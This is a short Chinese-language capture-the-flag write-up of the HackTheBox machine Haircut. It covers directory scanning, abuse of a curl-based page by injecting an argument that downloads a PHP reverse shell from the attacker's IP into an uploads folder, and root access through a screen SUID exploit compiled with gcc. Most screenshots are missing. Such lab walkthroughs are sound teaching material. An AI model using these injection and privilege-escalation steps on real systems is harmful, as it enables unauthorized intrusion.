Haircut - HackTheBox
Td

image

nmap扫描

image

image

image

访问80端口

image

就一张图片,扫个目录

gobuster dir -u "http://10.10.10.24" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,sh,pl -t 30

image

image

有点像ssrf

image

执行之后还是一张图片,看看能不能反弹shell回来

image

image

被过滤了,感觉是curl,应该能重定向文件

准备一个php反弹shell

http://10.10.14.13/php-reverse-shell.php -o /var/www/html/test.php

image

无权限写,但之前扫目录的时候发现一个uploads目录,往那里写一下

image

好像成功了,访问一下

image

提权

image

又是pkexec,换一种方式吧

image

screen这个版本有权限提升漏洞

image

image

先创建两个文件,libhax.c,rootshell.c

image

image

让靶机下载编译

image

这个问题好像是gcc版本问题,先编译好再让靶机下载

采用静态编译

gcc -fPIC -shared -ldl -o libhax.so libhax.c --static

image

image

image

image

然后依次执行这些命令

image

rootshell文件即会拥有suid权限,执行就会触发rootshell里面的/bin/bash,达到权限提升

image

image